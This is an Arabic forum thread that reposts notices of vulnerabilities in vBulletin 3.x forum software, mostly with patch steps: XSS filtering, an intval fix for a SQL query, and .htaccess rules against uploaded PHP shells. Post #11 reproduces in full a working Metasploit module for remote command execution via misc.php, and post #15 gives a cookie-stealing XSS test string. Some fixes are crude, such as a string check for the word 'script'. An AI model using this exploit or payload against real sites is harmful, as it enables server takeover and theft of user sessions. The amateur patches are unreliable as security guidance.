صفحة 1 من 2 12 الأخيرةالأخيرة
النتائج 1 إلى 15 من 26

الموضوع: جميع ثقرات الجيل الثالث vb

  1. #1

    جـمـيــــــــــــع ثــقـــــرات الجيل الثالث vb



    ترقيع لثغرة موجودة في نسخ الـ vBulletin من 3.0.3- 3.0.10

    منقول
    --------------------------------------------------------------------------------

    السلام عليكم و رحمة الله

    تلقيت رسالة من شركة جيل سوفت تفيد عن وجود ثغرة من نوع (cross site scripting)
    و هي موجودة في 3.0.3 - 3.0.10

    لترقيع الثغرة عليك استبدال ملف functions_file.php الموجود في مجلد includes بالملف الموجود في المرفقات

    رابط الموضوع الأساسي
    http://www.vbulletin.com/forum/showthread.php?t=166389





    الملفات المرفقة الملفات المرفقة
    mbc30.com غير متواجد حالياً


  2. #2


    منقوووووووووووووووول

    الأمس الشركة الأم vbulletin أصدرت نسختين جديدتين وهما vb3.5.2 و vb3.0.11
    وذلك لإضافة بعض المميزات وترقيع الثغرات وأصدرت باتش لمن لا يريد الترقية لإغلاق الثغرات.

    لأصحاب النسخ vb3.5.1 إضغط هنا
    لأصحاب النسخ vb3.0.10 إضغط هنا

    باسوورد فك الضغط::-
    www.dev4arab.net

    ================

    طريقة التركيب ::
    فك الضغط عن الملفات ستجد مجلد 351_patch و 3010_patch بداخلهم مجلد includes إرفع بال Ftp وإستبدل الملفات .

    يمكنك تحميل الملفات من المرفقات بنفس باسوورد فك الضغط
    http://www.traidnt.net/vb/attachment...0&d=1133984643
    http://www.traidnt.net/vb/attachment...1&d=1133984643





    mbc30.com غير متواجد حالياً

  3. #3


    منقوووووووووووووووووووووووووول


    ثغره] من لوحة تحكم المنتدى الكوكيز

    --------------------------------------------------------------------------------

    أخواني تضرر موقعي من أحدى الهكر الذين يلعبون في المواقع وقد علمني ما هي الثغرات التي تكون موجوده وغالبا في أوامر معينه

    أخواني حل للثغره

    تذهب لخيارات المنتدى


    وبعدها خيارات مرقبه الكلمات الممنوعه

    http://www.9wrh.com/get.php?filename=1131038056.gif

    تضف كلمه (( كوكي )) وبعد ذلك حفظ

    http://www.9wrh.com/get.php?filename=1131038109.gif

    وهذه طريقه سد الثغره الأولى

    اما الطريقه الثانية وهي ان تحظ من تحكم المرفقات صيغه psd

    وشرح الطريقه هي

    1- من لوحة تحكم المنتدى تذهب إلى .
    التحكم بالملفات المرفقه

    2- تختار الامتدادات والحجم

    3- تقوم بحذف صيغه psd

    وهي الطريقه الثانية لسد الثغره الاخرى

    وان شاء الله وفقت بالشرح معكم ودمتم بكل ود





    mbc30.com غير متواجد حالياً

  4. #4


    منقوووووووووووووووووووووووووووووووووووول


    [ ثغره] Path Disclosure في نسخ vBulletin 3.5.0

    --------------------------------------------------------------------------------

    السلام عليكم ورحمة الله وبركاته

    بدأت منذ أسبوع فتح ملفات نسخة vBulletin 3.5.0 العجيبه والتي تسعى مجموعة jelsoft أن تجعلها نسخ ثابته في الأشهر القادمه ووصلت بتطويرها حتى الان الى إصداره أسمتها Candidate 3 وهذا يعني أن النسخه ثبتت بعد إصدارات البيتا التي طرحتها منذ فتره وعلى مايبدوا أنها ستطلق النسخه الرسميه الثابته على بداية العام الجديد 2006م وأرى أن بعض الأخوان هنا بسوالف تسرع بتركيب هذه النسخه والتي لا يعلم أحد عنها سوى خاصية الـ plugins و الـ ajax .

    قمت بالبحث عن الثغرات في هذه النسخه وهذا أول الخير بإذن الله
    ثغره من نوع Path Disclosure ومستواها متوسط وعن طريقها يستطيع المخترق معرفة دليل الموقع موجود بأي مكان على الخادم


    الثغره موجوده في ملف class_core.php وبالتحديد في سطر رقم 1365


    foreach ($this->superglobal_lookup AS $arrayname)
    {
    $registry->superglobal_size["$arrayname"] = sizeof($GLOBALS["$arrayname"]);

    foreach (array_keys($GLOBALS["$arrayname"]) AS $varname)
    {
    unset($GLOBALS["$varname"]); <<------


    الترقيع:
    1- افتح ملف class_core.php وابحث عن السطر التالي :

    unset($GLOBALS["$varname"]);


    2- إستبدله بالأتي:


    if( !in_array($varname, $this->superglobal_lookup ))
    unset($GLOBALS["$varname"]);



    3- إحفظ الملف وقم برفعه.

    تحياتي لكم





    mbc30.com غير متواجد حالياً

  5. #5


    منقوووووووووووووووووووووووووووووووووول

    ثغرة التصريح 777

    --------------------------------------------------------------------------------

    السلام عليكم ورحمة الله وبركاته

    أخواني الأعضاء فيمعهد ترايدنت
    لاحظت أن الأغلبيه يستخدم سكربتات لرفع الملفات في موقعه وهذه السكربتات كثيره منها ماهو أمن ومنها ماهو غير أمن ، وهذه السكربتات تشترط منك ياصاحب الموقع أن تقوم بعمل تصريح 777 او تصريح 707 لمجلد معين وهذه التصاريح تسمح لزوار موقعك بالكتابه في المجلد الذي قمت أنت بتصريحه.
    الخطوره هنا من ملفات الـ php لأنها تحتوي على تعليمات برمجيه يتم تنفيذها داخل خادم الموقع .
    فلو قام أحد الأطفال المخترقين من رفع ملف php إلى الخادم بأي ثغرة كانت فسوف يبحث عن المجلدات ذات تصريح 777 أو 707 لأن صلاحياته صلاحيات زائر وحين يجد هذه المجلدات فسوف يستخدمها كمعسكر لملفاته وسكربتاته مثل : PHPShell ، MySQLInterface ............. الخ بعدها سيصل إلى ملفات موقعك وبعدها أنت تعلم ماذا سيفعل

    إذن ما الحل الصحيح لهذه المجلدات !؟!؟

    الحل طبعاً بتعطيل تنفيذ الـ php داخل هذه المجلدات عن طريق تعليمه تضيفها في ملف الـ .htaccess وهي :


    php_flag engine off



    بعدها تقوم برفع ملف الـ .htaccess الى كل المجلدات ذات تصريح 777 .

    وللتجربه قم برفع اي سكربت php للمجلدات ذات التصاريح 777 والتي تحتوي على الـ htaccess وقم بالدخول على هذا السكربت وشاهد النتيجه .
    سوف تجد أن السكربت لم يقم الخادم بتنفيذه

    ملف .htaccess مرفق


    طبعا مدري لو كان الموضوع موجود من قبل





    الملفات المرفقة الملفات المرفقة
    mbc30.com غير متواجد حالياً

  6. #6


    منقووووووووووووووووووول

    [ ثغره] ملف التعليمات faq.php

    --------------------------------------------------------------------------------

    للإصدارة ما قبل الإصدار الأخير vb3.0.7

    3- ثغرة ملف التعليمات faq.php و طريقة سد هذه الثغرة؟

    افتح ملف التعليمات faq.php الموجود في مجلد منتداك الرئيسي و ابحث عن الكود:

    // initialize some template bits
    $faqbits = '';
    $faqlinks = '';


    أضف بعده الكود:

    $navbits[''] =$vbphrase['faq'];


    ثم احفظ الملف





    mbc30.com غير متواجد حالياً

  7. #7


    منقووووووووووووووول

    [ثغره] في ملف editpost.php

    --------------------------------------------------------------------------------

    للإصدارة ما قبل الإصدار الأخير vb3.0.7

    4- ثغرة ملف تعديل المشاركة editpost.php و طريقة سد هذه الثغرة؟

    افتح الملف editpost.php الموجود في مجلد منتداك الرئيسي و ابحث عن الكود:

    $edit['title'] = trim($_POST['title']);


    و استبدله بالكود التالي:

    $edit['title'] = trim(xss_clean($_POST['title']));


    و في نفس الملف قم بوضع هذا الكود بعد الكلمة <?php و تجدها في أول الملف و هذا هو الكود:

    $title = addslashes($title);
    if (strstr($title,"script") != NULL){
    echo "Warning..Are you hacker?<br>vBulletin<br>note: use scr!pt";
    exit;
    }

    تحياتي :con2:





    mbc30.com غير متواجد حالياً

  8. #8


    منقووووووووووووووووووول

    [ثغره] خطيرة بالنسخة 3.0.9 تسمح بالاختراق

    --------------------------------------------------------------------------------

    الإقتباس
    المشاركة الأصلية كتبت بواسطة الامراء




    مساء الخير للجميع وكل عام ونتم بخير وصحه وعافيه
    مبارك عليكم الشهر وتقبل الله صيامكم وقيامكم
    اخوتي الكرام اسعد الله ايامكم بالافراح والمسرات
    لقد اكتشفت في النسخ الاخير 3.0.9 للمنتديات الفي بي ثغرة تسمح بالاختراق وتم اكتشافها
    وهي عى النحو التالي :
    1- يتم تسجيل العضو بالمنتدى وبعدها يتم تغيير لقبة الي مثلا ( المدير العام او المشرف العام )
    ومن الغريب انه توجد لدية صلاحيات المدير العام او المشرف العام
    2- اثناء تتبعي للعضو اثناء دخوله المنتدى وتغيير لقبة دون ان اقوم بتفعيل اشتراكه بالمنتدى
    اصلا وجدة قد دخل عن طريق ملف user
    اي معناها ان الثغرة موجودة بهذا الملف والسبب ان هذا العضو دخل المنتدى 5 مرات عن طريق هذا
    الملف وباسماء مختلفه وايبي مختلف وايميل مختلف طبعا ؟
    مع العلم انني مغلق جميع الثغرات ومسوي جدار ناري للمجلدات الحساسه بالمنتدى واهمها لوحه تحكم المشرف العام
    كيفيه ترقيع الثغرة لاحد يسالني لاني طرحت الموضوع حتى يتم النقاش فيه وايجاد الحل المناسب
    لهذه الثغرة
    نرجو من لديه خلفيه عن هذه الثغره وكيفيه اغلاقها بان لايبخل علينا بالمساعدة في التخلص منها

    بندر العنزي :nice:





    mbc30.com غير متواجد حالياً

  9. #9


    منقووووووووووووووووووووول

    [ثغرة] في ملف authorize.php

    --------------------------------------------------------------------------------

    السلام عليكم ورحمة الله وبركاته

    ثغرة ملف authorize.php للبيع و الشراء و طريقة ترقيعها

    هذا الملف هو ملف بيع و شراء مثل paypal و الطريقة طبعا هي حذفه نهائيا و لا توجد طريقة غيرها للآن و طبعا قم بحذفه لأنه لا يفيدك و هو موجود داخل مجلد subscriptions الموجود داخل مجلد منتداك الرئيسي و لكن إذا كنت ممن يودون استخدامه فتفضل الحل : افتح الملف و ابحث عن الكود :

    $userid = $DB_site->query_first("SELECT userid, languageid, styleid FROM " . TABLE_PREFIX . "user WHERE userid = " . $item_number[1]);


    و استبدله بالكود التالي :

    $userid = $DB_site->query_first("SELECT userid, languageid, styleid FROM " .
    TABLE_PREFIX . "user WHERE userid = " .intval( $item_number[1]));


    و السلام عليكم و رحمة الله و بركاتة

    لا تنسونا من الدعاء الصالح

    النمر ,,





    mbc30.com غير متواجد حالياً

  10. #10


    منقوووووووووووووول


    [ثغرة] مركز تحميل الصور + سد الثغره

    --------------------------------------------------------------------------------

    بسم الله الرحمن الرحيم

    السلام عليكم ورحمة الله وبركاته


    الى كل من لديه مركز

    1 - تحميل الصور
    2 - تحميل الملفات
    3 - تحميل الأفلام <-------- هذا ما اعتبره ضروري


    ان هناك سكربتات كثير يوجد بها ثغراة

    تسمح للمخترقين بالتسلل الى السيرفر

    وبأمكانهم رفع الشل shll

    و أخذ نسخه احتياطيه لأي سكربت كالمنتدى او المجله .... الخ

    ================

    فأتمنى من الجميع ان يضعو هذا الهاك الذي ارفقته بداخل مجلد الصور او الملفات

    حتى لا يستطيع احد اختراقه

    ===============

    ان برمجته سهله اضفت به الداله RemoveType حتى لاتعمل فايلات الهكر او الكراك وهي تنفع لمستخدمي سيرفر ليونكس اما عن wap serv فهي على الأرجح لا تعمل
    وهو عباره عن جدار حمايه لفايلات المصرحه chmod 777

    اتمنى من الجميع ذكر المصدر
    والدعاء الصالح

    ودمتم بخير
    فتى الأمارات

    المرفق يرجى تحميله
    من هنا





    الملفات المرفقة الملفات المرفقة
    mbc30.com غير متواجد حالياً

  11. #11


    منقووووووووووووووووووووووول

    [ثغره] بملف الـ misc.php

    --------------------------------------------------------------------------------




    السلام عليكم يا أعضاء ترايدنت

    ثغره تمكنك من رفع شل على الموقع

    وللترقيع

    الترقيه الي اخر اصدار او الي قبله

    مكتشف الثغره
    str0ke

    تاريخ: 2005-08-03


    كود:
    ##
    # Title: vBulletin <= 3.0.6 (Add Template Name in HTML Comments = Yes) command execution eXploit
    # Name: php_vb3_0_6.pm
    # License: Artistic/BSD/GPL
    # Info: trying to get the command execution exploits out of the way on milw0rm.com. M's are always good.
    #
    #
    # - This is an exploit module for the Metasploit Framework, please see
    # http://metasploit.com/projects/Framework for more information.
    ##

    package Msf::Exploit:hp_vb3_0_6;
    use base "Msf::Exploit";
    use strict;
    use Pex::Text;
    use bytes;

    my $advanced = { };

    my $info = {
    'Name' => 'vBulletin <= 3.0.6 (Add Template Name in HTML Comments = Yes) command execution eXploit',
    'Version' => '$Revision: 1.0 $',
    'Authors' => [ 'str0ke' ],
    'Arch' => [ ],
    'OS' => [ ],
    'Priv' => 0,
    'UserOpts' =>
    {
    'RHOST' => [1, 'ADDR', 'The target address'],
    'RPORT' => [1, 'PORT', 'The target port', 80],
    'VHOST' => [0, 'DATA', 'The virtual host name of the server'],
    'RPATH' => [1, 'DATA', 'Path to the misc.php script', '/forum/misc.php'],
    'SSL' => [0, 'BOOL', 'Use SSL'],
    },

    'Description' => Pex::Text::Freeform(qq{
    This module exploits a code execution flaw in vBulletin <= 3.0.6.
    }),

    'Refs' =>
    [
    ['MIL', '832'],
    ],

    'Payload' =>
    {
    'Space' => 512,
    'Keys' => ['cmd', 'cmd_bash'],
    },

    'Keys' => ['vBulletin'],
    };

    sub new {
    my $class = shift;
    my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
    return($self);
    }

    sub Exploit {
    my $self = shift;
    my $target_host = $self->GetVar('RHOST');
    my $target_port = $self->GetVar('RPORT');
    my $vhost = $self->GetVar('VHOST') || $target_host;
    my $path = $self->GetVar('RPATH');
    my $cmd = $self->GetVar('EncodedPayload')->RawPayload;

    # Encode the command as a set of chr() function calls
    my $byte = join('.', map { $_ = 'chr('.$_.')' } unpack('C*', $cmd));

    # Create the get request data
    my $data = "?do=page&template={\${passthru($byte)}}";

    my $req =
    "GET $path$data HTTP/1.1\r\n".
    "Host: $vhost:$target_port\r\n".
    "Content-Type: application/html\r\n".
    "Content-Length: ". length($data)."\r\n".
    "Connection: Close\r\n".
    "\r\n";

    my $s = Msf::Socket::Tcp->new(
    'PeerAddr' => $target_host,
    'PeerPort' => $target_port,
    'LocalPort' => $self->GetVar('CPORT'),
    'SSL' => $self->GetVar('SSL'),
    );

    if ($s->IsError){
    $self->PrintLine('[*] Error creating socket: ' . $s->GetError);
    return;
    }

    $self->PrintLine("[*] Sending the malicious vBulletin Get request...");

    $s->Send($req);

    my $results = $s->Recv(-1, 20);
    $s->Close();

    return;
    }

    1;


    وللتوضيح اكثر
    الثغره في ملف

    misc.php

    المصدر:

    http://www.milw0rm.com/id.php?id=1133





    mbc30.com غير متواجد حالياً

  12. #12


    منقووووووووووووووووووول

    السلام عليكم

    الصراحة لقيت مواقع كثيرة تعاني من ها الثغرة

    المكتشف : العندليب

    قم بفتح ملف العشره مواضيع باسم (last10config.php) او (configlast.php)


    الترقيع سهل

    ابحث عن كلمة وامسحها

    $fsel

    وكذلك كلمة

    $ftitle

    انسخ الكلمه والصقها في البحث





    mbc30.com غير متواجد حالياً

  13. #13


    منقووووووووووووووووووووول

    ثغره] بملف includes/functions_faq.php

    --------------------------------------------------------------------------------

    السلام عليكم ورحمة الله وبركاته
    تم اكتشاف ثغرة في جميع اصدارات المنتديات حتى الاصدار السابع

    والثغرة معروضة في منتدى شركة فبلتن

    كان في ثغرة قديمة في نفس الملف لكن الان تم اكتشاف ثغرة أخطر منها

    تاريخ اكتشاف الثغرة 2005 1426/5/12

    والثغرة في ملف includes/functions_faq.php

    طريقة اغلاق الثغرة :

    ضع الملف المرفق بالمرفقات بدلا من الملف القديم ومنتداك راح يكون سليم ان شاء الله

    لن أشرح طريقة استغلال الثغرة الان

    لأن منتدانا الغالي مصاب بالثغرة وجميع المنتديات

    بعد اغلاق الثغرة سأشرح طريقة استغلالها

    أرجوا تثبيت الموضوع لأنه خلال أسبوع سأشرح طريقة استغلال الثغرة

    في الموضوع نفسه سأضعه في رد (بالصور)


    تحياتي :

    sos_vb

    (منقووووووووووووووووووووووووووووووووووووووول





    الملفات المرفقة الملفات المرفقة
    mbc30.com غير متواجد حالياً

  14. #14


    منقووووووووووووووووووووووول

    [ثغره] بملف الرسائل الخاصه private.php

    ثغرة في الرسائل الخاصة
    الاصدارات المصابة vb من 3.0 الى 3.0.7
    جربت على جميع الاصدرات ونجحت الثغرة
    المهم
    ترقيع الثغرة
    1- تغيير بملف private.php
    ابحث عن
    $pm['title'] = trim($pm['title']);
    استبدله بـ
    $pm['title'] = trim(xss_clean($pm['title']));

    ===============================

    تركي الودعاني المصدر
    ووصلتني ثغره يوم امس واضنها جديده علي وربما تكون قديمه لدى البعض منكم
    واشكر الاخ الفاضل jihad حيث نبهني بوجود ثغره في المعهد وتم حذفها يوم امس
    ومن هنا ارجو ممن يملكون النسخه الثالثه سواء مرخصه او منزوعه كود التبليغ
    البحث في ملف private.php عن

    $pm['title'] = htmlspecialchars_uni($pm['title']);

    قم بحذفها فقط





    mbc30.com غير متواجد حالياً

  15. #15


    منقووووووووووووووووول

    [ثغره] ببعض الملفات بجميع النسخ من 3.0.3 الى 3.0.7

    --------------------------------------------------------------------------------

    السلام عليكم ورحمة الله وبركاته ،،
    هذا الموضوع مأخوذ من بعض المواقع والمنتديات . ( مهم ) للمعلومية
    تحياتي أخوكم الصم


    5/ شرح أخي oman4hosting :
    لقد تم اكتشاف ثغرة خطيرة فى منتديات vb3
    ثغرة الرسائل الخاصة
    الاصدارت المصابة هى 3.03, 3.0.4 ,3.0.5 3.0.6,3.0.7

    للتأكد من وجود الثغرة اتبع الاتي:
    قم بكتابة رسالة جديدة و ضع اسم المستلم و العنوان و في المضمون ضع الكود التالي:

    <Script>javascript:alert(document.cookie);</Script>

    و اعمل مشاهدة و شووف اللي يظهر لك,, :nice:
    ترقيع الثغرة:
    ترقيع الثغرة
    1- تغيير بملف private.php
    ابحث عن

    $pm['title'] = trim($pm['title']);


    استبدلها بى

    $pm['title'] = trim(xss_clean($pm['title']));


    تحية طيبة,, المصدر ميعادي ,,


    +++++++++++++++++++++++

    6/ شرح أخي المتميز :
    بسم الله الرحمن الرحيم ..
    الصلاة والسلام على نبينا محمد و على اله و صحبه اجمعين ..
    اللهم لاعلم الا ماعلمتنا ...
    اما بعد ..
    و طبعا الاصدار 3.0.7
    ياشباب تم اكتشاف ترقيع لها و تم اكتشاف الثغرة من قبل موقع سكيروتي ; هذاي الثغرة التي يستخدمها اكبر عدد من الهكر ;
    والثغرة الاولى functions_search وهذاي ثغرة ماهي قويه كثير ;
    والحل لها انك تنزل الملف اللي انا حاطه بالمرفقات ; تم اكتشاف الترقيع من قبل فريق S@udi virus
    تم الانتهاء من هذاي الثغرة والحمد لله ;
    ---
    نجي لثغرة خطيره جدا جدا جدا ; بالنسبه لي
    misc.php = هذي الثغرة تقوم بأرسال اوامر اللينكس يعني كأنك رافع لك شل !! يعني توفر عليك و طبعا الهكر مابقو شيء مااكتشفوه اكتشفو حتى كيف تخطى السيف مود ; لا اله الا الله عليهم !!
    :anger2:
    وهذي الثغرة خطيره ;
    والترقيع بالمرفقات
    الملفات المرفقة :
    http://www.swalif.net/softs/attachme...chmentid=18491





    mbc30.com غير متواجد حالياً





ضوابط المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •  

أضف موقعك هنا| اخبار السيارات | حراج | شقق للايجار في الكويت | بيوت للبيع في الكويت | دليل الكويت العقاري | مقروء | شركة كشف تسربات المياه | شركة عزل اسطح بالرياض | عزل فوم بالرياض| عزل اسطح بالرياض | كشف تسربات المياة بالرياض | شركة عزل اسطح بالرياض